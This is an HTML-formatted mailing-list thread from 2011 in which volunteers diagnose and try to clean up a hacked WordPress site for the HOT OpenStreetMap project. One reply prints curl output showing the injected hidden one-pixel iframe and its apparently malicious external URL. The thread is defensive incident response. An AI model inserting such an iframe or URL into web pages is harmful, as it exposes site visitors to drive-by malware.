<html><body><div style="color:#000; background-color:#fff; font-family:arial, helvetica, sans-serif;font-size:10pt">I just shut down the site<br><br>We have access to the wordpress admin interface which allows us to
install plugins. The installed code then has all kinds of access, so there are avenues open to us. I just installed the 'wp maintenance mode' plugin, which shuts puts up a maintenance message to all visitors (except admin users) while we tackle the problem.<br><br>I also tried installing wp-malwatch plugin. This scans for various for malware, but it didn't find anything, perhaps because it's not up-to-date with this kind of exploit. <br><br>Beyond that I guess we could install a breaking-all-security-models plugin to give me arbitrary access for viewing and changing files. Somebody know of such a dangerous plugin? I could try to write one myself.<br><br>but... <br><br>The easy/sensible way to fix this would be to have the ssh and FTP
access. Mikel has those credentials, is he unreachable currently? I
wonder if Robert Soden also has them?<br><br>Harry Wood<br><div><br></div><div><br></div><div style="font-family: arial, helvetica, sans-serif; font-size: 10pt;"><div style="font-family: times new roman, new york, times, serif; font-size: 12pt;"><font face="Arial" size="2"><hr size="1"><b><span style="font-weight:bold;">From:</span></b> Ariel Nunez <ingenieroariel@gmail.com><br><b><span style="font-weight: bold;">To:</span></b> Kate Chapman <kate@maploser.com><br><b><span style="font-weight: bold;">Cc:</span></b> hot@openstreetmap.org<br><b><span style="font-weight: bold;">Sent:</span></b> Monday, 24 October 2011, 16:23<br><b><span style="font-weight: bold;">Subject:</span></b> Re: [HOT] Malware on hot.openstreetmap.org<br></font><br><meta http-equiv="x-dns-prefetch-control" content="off"><div id="yiv29153243">Kate,<div><br></div><div>If someone could hack it via FTP and add that, perhaps we can hack it to and remove
it.</div><div><br></div><div>It actually sounds like fun.</div><div><br></div><div>Ariel.<br><br><div class="yiv29153243gmail_quote">
On Mon, Oct 24, 2011 at 2:37 AM, Kate Chapman <span dir="ltr"><<a rel="nofollow" ymailto="mailto:kate@maploser.com" target="_blank" href="mailto:kate@maploser.com">kate@maploser.com</a>></span> wrote:<br><blockquote class="yiv29153243gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex;">
Unfortunately there does not appear to be a way I can fix this without<br>
having access to the actual server.<br>
<br>
Any suggestions? My though is to back-up the blog posts and move it<br>
to another wordpress instance. That way then we could switch the DNS<br>
to the new server.<br>
<br>
-Kate<br>
<br>
On Sun, Oct 23, 2011 at 11:36 PM, Rodolphe Quiedeville<br>
<div><div></div><div class="yiv29153243h5"><<a rel="nofollow" ymailto="mailto:rodolphe@quiedeville.org" target="_blank" href="mailto:rodolphe@quiedeville.org">rodolphe@quiedeville.org</a>> wrote:<br>
> Le 24/10/2011 08:28, Kate Chapman a écrit :<br>
>> I switched the theme. I'm not seeing the iFrame anymore, but maybe I'm<br>
>> missing something.<br>
><br>
> The iframe is not on the /weblog/ pages you can see it when you call the<br>
> root url like this :<br>
><br>
><br>
> rodo@elz:~$ curl <a rel="nofollow" target="_blank" href="http://hot.openstreetmap.org">hot.openstreetmap.org</a><br>
> <html><br>
> <head><br>
> <META HTTP-EQUIV="refresh" content="0;URL=/weblog"><br>
> </head><br>
> <body><iframe<br>
> src="<a rel="nofollow" target="_blank" href="http://probable-waitress.mypicture.info/showthread.php?t=68791819">http://probable-waitress.mypicture.info/showthread.php?t=68791819</a>"<br>
> width="1" height="1"></iframe><br>
> <script type="text/javascript"><br>
> var gaJsHost = (("https:" == document.location.protocol) ?<br>
> "<a rel="nofollow" target="_blank" href="https://ssl">https://ssl</a>." : "<a rel="nofollow" target="_blank" href="http://www">http://www</a>.");<br>
> document.write(unescape("%3Cscript src='" + gaJsHost +<br>
> "<a rel="nofollow" target="_blank" href="http://google-analytics.com/ga.js">google-analytics.com/ga.js</a>' type='text/javascript'%3E%3C/script%3E"));<br>
> </script><br>
> <script type="text/javascript"><br>
> var pageTracker = _gat._getTracker("UA-5963453-1");<br>
> pageTracker._trackPageview();<br>
> </script><br>
> </body><br>
> </html><br>
><br>
> Have a look at the beginning of body part<br>
><br>
> It's probably not in the theme part of Wordpress, but somewhere in the<br>
> config parts of the blog.<br>
><br>
> Regards<br>
><br>
><br>
><br>
>><br>
>> -Kate<br>
>><br>
>> On Sun, Oct 23, 2011 at 10:49 PM, Rodolphe Quiedeville<br>
>> <<a rel="nofollow" ymailto="mailto:rodolphe@quiedeville.org" target="_blank" href="mailto:rodolphe@quiedeville.org">rodolphe@quiedeville.org</a>> wrote:<br>
>>> Hi,<br>
>>><br>
>>> Someone cracked the Wordpress installed on <a rel="nofollow" target="_blank" href="http://hot.openstreetmap.org">hot.openstreetmap.org</a> and add<br>
>>> an iframe to :<br>
>>><br>
>>> <a rel="nofollow" target="_blank" href="http://probable-waitress.mypicture.info/showthread.php?t=68791819">http://probable-waitress.mypicture.info/showthread.php?t=68791819</a><br>
>>><br>
>>> Edit the wordpresss template, remove this iframe and it could resolve<br>
>>> the problem. The security alert occurs on Firefox too.<br>
>>><br>
>>> Regards<br>
>>><br>
>>><br>
>>> Le 23/10/2011 23:33, Kate Chapman a écrit :<br>
>>>> Hi Floris,<br>
>>>><br>
>>>> Yes, I know about the problem but haven't been able to fix it. I think<br>
>>>> logging into the server might be necessary, but I think only Mikel has<br>
>>>> access.<br>
>>>><br>
>>>> If anyone has other suggestions please help.<br>
>>>><br>
>>>> Kate<br>
>>>><br>
>>>> On Oct 23, 2011 7:54 AM, "Floris Looijesteijn" <<a rel="nofollow" ymailto="mailto:osm@floris.nu" target="_blank" href="mailto:osm@floris.nu">osm@floris.nu</a><br>
>>>> <mailto:<a rel="nofollow" ymailto="mailto:osm@floris.nu" target="_blank" href="mailto:osm@floris.nu">osm@floris.nu</a>>> wrote:<br>
>>>><br>
>>>> I'm getting warnings from Chrome at the moment that<br>
>>>> <a rel="nofollow" target="_blank" href="http://hot.openstreetmap.org">hot.openstreetmap.org</a> <<a rel="nofollow" target="_blank" href="http://hot.openstreetmap.org">http://hot.openstreetmap.org</a>> is infected<br>
>>>> with malware.<br>
>>>><br>
>>>> Anybody want to look into that?<br>
>>>><br>
>>>> Here's the google diagnose page for it:<br>
>>>><br>
>>>> <a rel="nofollow" target="_blank" href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en">http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en</a><br>
>>>> <<a rel="nofollow" target="_blank" href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en">http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en</a>><br>
>>>><br>
>>>> Greetings,<br>
>>>> Floris Looijesteijn<br>
>>>><br>
>>>> (tracing Van, Turkey)<br>
>>>><br>
>>>> _______________________________________________<br>
>>>> HOT mailing list<br>
>>>> <a rel="nofollow" ymailto="mailto:HOT@openstreetmap.org" target="_blank" href="mailto:HOT@openstreetmap.org">HOT@openstreetmap.org</a> <mailto:<a rel="nofollow" ymailto="mailto:HOT@openstreetmap.org" target="_blank" href="mailto:HOT@openstreetmap.org">HOT@openstreetmap.org</a>><br>
>>>> <a rel="nofollow" target="_blank" href="http://lists.openstreetmap.org/listinfo/hot">http://lists.openstreetmap.org/listinfo/hot</a><br>
>>>><br>
>>>><br>
>>>><br>
>>>> _______________________________________________<br>
>>>> HOT mailing list<br>
>>>> <a rel="nofollow" ymailto="mailto:HOT@openstreetmap.org" target="_blank" href="mailto:HOT@openstreetmap.org">HOT@openstreetmap.org</a><br>
>>>> <a rel="nofollow" target="_blank" href="http://lists.openstreetmap.org/listinfo/hot">http://lists.openstreetmap.org/listinfo/hot</a><br>
>>><br>
>>><br>
>>> --<br>
>>> Rodolphe Quiédeville<br>
>>> <a rel="nofollow" target="_blank" href="http://cartosm.eu">http://cartosm.eu</a> - Intégration de carte libre sur site web<br>
>>> Blog : <a rel="nofollow" target="_blank" href="http://blog.rodolphe.quiedeville.org/">http://blog.rodolphe.quiedeville.org/</a><br>
>>> SIP/XMPP : <a rel="nofollow" ymailto="mailto:rodolphe@quiedeville.org" target="_blank" href="mailto:rodolphe@quiedeville.org">rodolphe@quiedeville.org</a><br>
>>><br>
>>> _______________________________________________<br>
>>> HOT mailing list<br>
>>> <a rel="nofollow" ymailto="mailto:HOT@openstreetmap.org" target="_blank" href="mailto:HOT@openstreetmap.org">HOT@openstreetmap.org</a><br>
>>> <a rel="nofollow" target="_blank" href="http://lists.openstreetmap.org/listinfo/hot">http://lists.openstreetmap.org/listinfo/hot</a><br>
>>><br>
><br>
><br>
> --<br>
> Rodolphe Quiédeville<br>
> <a rel="nofollow" target="_blank" href="http://cartosm.eu">http://cartosm.eu</a> - Intégration de carte libre sur site web<br>
> Blog : <a rel="nofollow" target="_blank" href="http://blog.rodolphe.quiedeville.org/">http://blog.rodolphe.quiedeville.org/</a><br>
> SIP/XMPP : <a rel="nofollow" ymailto="mailto:rodolphe@quiedeville.org" target="_blank" href="mailto:rodolphe@quiedeville.org">rodolphe@quiedeville.org</a><br>
><br>
<br>
_______________________________________________<br>
HOT mailing list<br>
<a rel="nofollow" ymailto="mailto:HOT@openstreetmap.org" target="_blank" href="mailto:HOT@openstreetmap.org">HOT@openstreetmap.org</a><br>
<a rel="nofollow" target="_blank" href="http://lists.openstreetmap.org/listinfo/hot">http://lists.openstreetmap.org/listinfo/hot</a><br>
</div></div></blockquote></div><br></div>
</div><meta http-equiv="x-dns-prefetch-control" content="on"><br>_______________________________________________<br>HOT mailing list<br><a ymailto="mailto:HOT@openstreetmap.org" href="mailto:HOT@openstreetmap.org">HOT@openstreetmap.org</a><br><a href="http://lists.openstreetmap.org/listinfo/hot" target="_blank">http://lists.openstreetmap.org/listinfo/hot</a><br><br><br></div></div></div></body></html>